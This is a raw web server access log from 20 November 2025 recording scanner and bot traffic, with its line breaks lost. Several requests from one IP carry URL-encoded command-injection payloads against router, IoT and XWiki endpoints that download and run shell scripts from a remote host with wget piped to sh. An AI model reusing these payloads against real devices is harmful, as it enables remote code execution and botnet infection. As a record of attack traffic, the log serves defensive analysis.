176.65.148.16 - - [20/Nov/2025:00:20:03 +0100] "GET /index.htm HTTP/1.1" 404 727 193.142.147.209 - - [20/Nov/2025:00:33:22 +0100] "GET / HTTP/1.1" 200 1895 3.86.241.49 - - [20/Nov/2025:00:46:22 +0100] "GET / HTTP/1.1" 200 1895 64.62.156.202 - - [20/Nov/2025:01:42:40 +0100] "-" 400 1930 176.65.150.72 - - [20/Nov/2025:01:42:42 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 45.38.44.221 - - [20/Nov/2025:02:19:20 +0100] "GET /login HTTP/1.1" 404 723 192.159.99.95 - - [20/Nov/2025:03:12:08 +0100] "POST /tmUnblock.cgi HTTP/1.1" 404 731 192.159.99.95 - - [20/Nov/2025:03:12:08 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 192.159.99.95 - - [20/Nov/2025:03:12:08 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756 192.159.99.95 - - [20/Nov/2025:03:12:08 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 404 727 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "GET null HTTP/1.1" 400 1994 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 731 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "POST /goform/mp HTTP/1.1" 404 731 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "POST /goform/setPingInfo HTTP/1.1" 404 740 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "POST /diagnostic.php HTTP/1.1" 404 732 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "GET /HNAP1/ HTTP/1.1" 404 728 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "POST /goform/SystemCommand HTTP/1.1" 404 742 192.159.99.95 - - [20/Nov/2025:03:12:09 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [20/Nov/2025:03:12:10 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [20/Nov/2025:03:12:10 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [20/Nov/2025:03:12:10 +0100] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 744 185.212.138.6 - - [20/Nov/2025:03:17:22 +0100] "GET / HTTP/1.1" 200 1895 45.38.44.221 - - [20/Nov/2025:03:23:09 +0100] "GET /login HTTP/1.1" 404 723 183.61.189.152 - - [20/Nov/2025:04:17:08 +0100] "GET /manager/html HTTP/1.1" 401 2499 198.235.24.171 - - [20/Nov/2025:04:22:44 +0100] "-" 400 1930 198.235.24.171 - - [20/Nov/2025:04:22:44 +0100] "-" 400 1930 178.128.95.222 - - [20/Nov/2025:04:26:53 +0100] "GET /aaa9 HTTP/1.1" 404 722 178.128.95.222 - - [20/Nov/2025:04:26:54 +0100] "GET /aab8 HTTP/1.1" 404 722 178.128.95.222 - - [20/Nov/2025:04:26:56 +0100] "GET / HTTP/1.1" 200 1895 176.65.150.72 - - [20/Nov/2025:04:35:33 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 193.142.147.209 - - [20/Nov/2025:04:42:10 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 45.38.44.221 - - [20/Nov/2025:05:14:56 +0100] "GET /login HTTP/1.1" 404 723 188.166.157.174 - - [20/Nov/2025:05:42:46 +0100] "GET /.env HTTP/1.1" 404 722 188.166.157.174 - - [20/Nov/2025:05:42:46 +0100] "GET /.git/config HTTP/1.1" 404 733 193.142.147.209 - - [20/Nov/2025:05:51:25 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [20/Nov/2025:05:55:02 +0100] "POST /tmUnblock.cgi HTTP/1.1" 404 731 192.159.99.95 - - [20/Nov/2025:05:55:02 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 192.159.99.95 - - [20/Nov/2025:05:55:02 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756 192.159.99.95 - - [20/Nov/2025:05:55:02 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 404 727 192.159.99.95 - - [20/Nov/2025:05:55:02 +0100] "GET null HTTP/1.1" 400 1994 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 731 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "POST /goform/mp HTTP/1.1" 404 731 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "POST /goform/setPingInfo HTTP/1.1" 404 740 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "POST /diagnostic.php HTTP/1.1" 404 732 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "GET /HNAP1/ HTTP/1.1" 404 728 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "POST /goform/SystemCommand HTTP/1.1" 404 742 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [20/Nov/2025:05:55:04 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [20/Nov/2025:05:55:05 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [20/Nov/2025:05:55:05 +0100] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 744 134.122.85.66 - - [20/Nov/2025:07:38:03 +0100] "GET / HTTP/1.0" 200 1895 207.154.248.179 - - [20/Nov/2025:07:38:03 +0100] "-" 400 1930 64.226.106.40 - - [20/Nov/2025:07:38:03 +0100] "GET /solr/admin/info/system HTTP/1.1" 404 752 64.226.123.61 - - [20/Nov/2025:07:38:03 +0100] "GET / HTTP/1.1" 200 1895 207.154.255.69 - - [20/Nov/2025:07:38:03 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 165.232.74.252 - - [20/Nov/2025:07:38:03 +0100] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 207.154.248.179 - - [20/Nov/2025:07:38:03 +0100] "-" 400 1930 64.226.106.40 - - [20/Nov/2025:07:38:03 +0100] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 207.154.255.69 - - [20/Nov/2025:07:38:03 +0100] "GET / HTTP/1.1" 200 1895 207.154.255.69 - - [20/Nov/2025:07:38:03 +0100] "-" 400 1930 159.223.38.45 - - [20/Nov/2025:07:38:03 +0100] "GET /favicon.ico HTTP/1.1" 404 729 64.226.106.40 - - [20/Nov/2025:07:38:03 +0100] "GET /v2/_catalog HTTP/1.1" 404 733 107.172.58.36 - - [20/Nov/2025:08:35:53 +0100] "GET / HTTP/1.1" 200 1895 3.149.59.26 - - [20/Nov/2025:09:15:24 +0100] "GET / HTTP/1.1" 200 1895 3.149.59.26 - - [20/Nov/2025:09:17:37 +0100] "GET / HTTP/1.1" 200 1895 45.82.78.103 - - [20/Nov/2025:09:19:38 +0100] "-" 400 1930 45.82.78.103 - - [20/Nov/2025:09:19:48 +0100] "-" 400 1930 45.82.78.103 - - [20/Nov/2025:09:19:49 +0100] "GET / HTTP/1.1" 200 1895 45.82.78.113 - - [20/Nov/2025:09:19:53 +0100] "GET /favicon.ico HTTP/1.1" 404 729 3.149.59.26 - - [20/Nov/2025:09:19:55 +0100] "-" 400 1930 3.149.59.26 - - [20/Nov/2025:09:22:50 +0100] "-" 400 1930 3.149.59.26 - - [20/Nov/2025:09:24:59 +0100] "-" 400 1930 192.159.99.180 - - [20/Nov/2025:09:33:53 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [20/Nov/2025:09:47:09 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 45.71.25.204 - - [20/Nov/2025:10:24:54 +0100] "GET / HTTP/1.0" 200 1895 193.142.147.209 - - [20/Nov/2025:10:47:57 +0100] "GET / HTTP/1.1" 200 1895 79.164.44.254 - - [20/Nov/2025:11:52:40 +0100] "GET /azenv.php HTTP/1.0" 404 727 79.164.44.254 - - [20/Nov/2025:11:52:40 +0100] "CONNECT www.google.com:80 HTTP/1.0" 400 804 79.164.44.254 - - [20/Nov/2025:11:52:50 +0100] "CONNECT www.google.com:80 HTTP/1.0" 400 804 79.164.44.254 - - [20/Nov/2025:11:53:00 +0100] "-" 400 1930 79.164.44.254 - - [20/Nov/2025:11:53:00 +0100] "-" 400 1930 79.164.44.254 - - [20/Nov/2025:11:53:00 +0100] "-" 400 1930 193.142.147.209 - - [20/Nov/2025:12:58:15 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 64.62.156.152 - - [20/Nov/2025:13:11:35 +0100] "GET / HTTP/1.1" 200 1895 64.62.156.156 - - [20/Nov/2025:13:12:22 +0100] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.159 - - [20/Nov/2025:13:12:40 +0100] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.161 - - [20/Nov/2025:13:12:46 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 64.62.156.152 - - [20/Nov/2025:13:13:03 +0100] "GET /geoserver/web/ HTTP/1.1" 404 740 45.43.63.181 - - [20/Nov/2025:13:14:12 +0100] "-" 400 1930 45.43.63.181 - - [20/Nov/2025:13:14:22 +0100] "GET / HTTP/1.1" 200 1895 45.43.63.181 - - [20/Nov/2025:13:14:41 +0100] "GET /favicon.ico HTTP/1.1" 404 729 45.43.63.181 - - [20/Nov/2025:13:14:41 +0100] "GET /robots.txt HTTP/1.1" 404 728 45.43.63.181 - - [20/Nov/2025:13:14:41 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 45.43.63.181 - - [20/Nov/2025:13:14:42 +0100] "GET /config.json HTTP/1.1" 404 729 193.142.147.209 - - [20/Nov/2025:14:30:41 +0100] "GET / HTTP/1.1" 200 1895 194.0.234.12 - - [20/Nov/2025:15:08:32 +0100] "-" 400 1930 194.0.234.12 - - [20/Nov/2025:15:16:37 +0100] "-" 400 1930 86.54.31.32 - - [20/Nov/2025:15:17:57 +0100] "GET / HTTP/1.1" 200 1895 86.54.31.32 - - [20/Nov/2025:15:17:57 +0100] "GET /favicon.ico HTTP/1.1" 404 729 20.81.46.136 - - [20/Nov/2025:15:28:09 +0100] "-" 400 1930 20.65.193.176 - - [20/Nov/2025:15:34:38 +0100] "GET /hudson HTTP/1.1" 404 724 83.142.209.224 - - [20/Nov/2025:15:35:23 +0100] "GET / HTTP/1.1" 200 1895 83.142.209.224 - - [20/Nov/2025:15:59:23 +0100] "GET / HTTP/1.1" 200 1895 194.0.234.12 - - [20/Nov/2025:16:16:16 +0100] "-" 400 1930 193.142.147.209 - - [20/Nov/2025:16:23:27 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 194.0.234.12 - - [20/Nov/2025:16:28:25 +0100] "-" 400 1930 192.227.134.89 - - [20/Nov/2025:16:49:11 +0100] "-" 400 1930 83.142.209.135 - - [20/Nov/2025:16:57:41 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 45.135.193.9 - - [20/Nov/2025:17:12:58 +0100] "GET /json/ HTTP/1.1" 404 727 193.142.147.209 - - [20/Nov/2025:17:34:00 +0100] "GET / HTTP/1.1" 200 1895 44.220.188.166 - - [20/Nov/2025:17:44:09 +0100] "GET / HTTP/1.1" 200 1895 204.76.203.230 - - [20/Nov/2025:17:46:32 +0100] "CONNECT cfdump.packetsdatabase.com:443 HTTP/1.1" 400 804 3.149.59.26 - - [20/Nov/2025:18:16:26 +0100] "GET / HTTP/1.1" 200 1895 3.149.59.26 - - [20/Nov/2025:18:18:21 +0100] "-" 400 1930 3.149.59.26 - - [20/Nov/2025:18:19:48 +0100] "-" 400 1930 3.149.59.26 - - [20/Nov/2025:18:21:33 +0100] "-" 400 1930 165.22.94.67 - - [20/Nov/2025:18:25:37 +0100] "-" 400 1930 79.164.44.254 - - [20/Nov/2025:18:57:06 +0100] "GET /generate_204 HTTP/1.0" 404 730 193.142.147.209 - - [20/Nov/2025:19:43:34 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 79.164.44.254 - - [20/Nov/2025:20:03:31 +0100] "-" 400 1930 79.164.44.254 - - [20/Nov/2025:20:03:31 +0100] "-" 400 1930 45.38.44.221 - - [20/Nov/2025:20:21:08 +0100] "GET /login HTTP/1.1" 404 723 167.99.199.99 - - [20/Nov/2025:20:51:42 +0100] "GET / HTTP/1.1" 200 1895 167.99.199.99 - - [20/Nov/2025:20:51:42 +0100] "GET /favicon.ico HTTP/1.1" 404 729 102.129.235.248 - - [20/Nov/2025:20:51:48 +0100] "CONNECT upload.wikimedia.org:443 HTTP/1.1" 400 804 176.65.150.72 - - [20/Nov/2025:21:05:22 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 138.199.19.52 - - [20/Nov/2025:21:08:03 +0100] "CONNECT www.uni-konstanz.de:443 HTTP/1.1" 400 804 193.142.147.209 - - [20/Nov/2025:21:08:52 +0100] "GET / HTTP/1.1" 200 1895 147.185.132.99 - - [20/Nov/2025:21:15:13 +0100] "GET / HTTP/1.1" 200 1895 45.38.44.221 - - [20/Nov/2025:21:15:25 +0100] "GET /login HTTP/1.1" 404 723 45.135.193.9 - - [20/Nov/2025:21:16:26 +0100] "GET /json/ HTTP/1.1" 404 727 176.65.148.108 - - [20/Nov/2025:21:21:32 +0100] "GET / HTTP/1.1" 200 1895 164.92.219.121 - - [20/Nov/2025:21:28:55 +0100] "GET / HTTP/1.1" 200 1895 83.142.209.224 - - [20/Nov/2025:21:38:18 +0100] "GET / HTTP/1.1" 200 1895 162.142.125.208 - - [20/Nov/2025:22:03:32 +0100] "GET / HTTP/1.1" 200 1895 162.142.125.208 - - [20/Nov/2025:22:03:36 +0100] "-" 400 1930 162.142.125.208 - - [20/Nov/2025:22:03:37 +0100] "GET / HTTP/1.1" 200 1895 162.142.125.208 - - [20/Nov/2025:22:03:37 +0100] "GET /favicon.ico HTTP/1.1" 404 729 162.142.125.208 - - [20/Nov/2025:22:03:49 +0100] "-" 400 1930 162.142.125.208 - - [20/Nov/2025:22:03:51 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 162.142.125.118 - - [20/Nov/2025:22:06:19 +0100] "-" 400 1930 162.142.125.118 - - [20/Nov/2025:22:06:19 +0100] "GET / HTTP/1.1" 200 1895 162.142.125.118 - - [20/Nov/2025:22:06:20 +0100] "GET /favicon.ico HTTP/1.1" 404 729 162.142.125.118 - - [20/Nov/2025:22:06:24 +0100] "-" 400 1930 162.142.125.118 - - [20/Nov/2025:22:06:24 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 746 193.142.147.209 - - [20/Nov/2025:23:12:57 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 192.159.99.101 - - [20/Nov/2025:23:30:41 +0100] "GET / HTTP/1.1" 200 1895 83.142.209.224 - - [20/Nov/2025:23:35:21 +0100] "GET / HTTP/1.1" 200 1895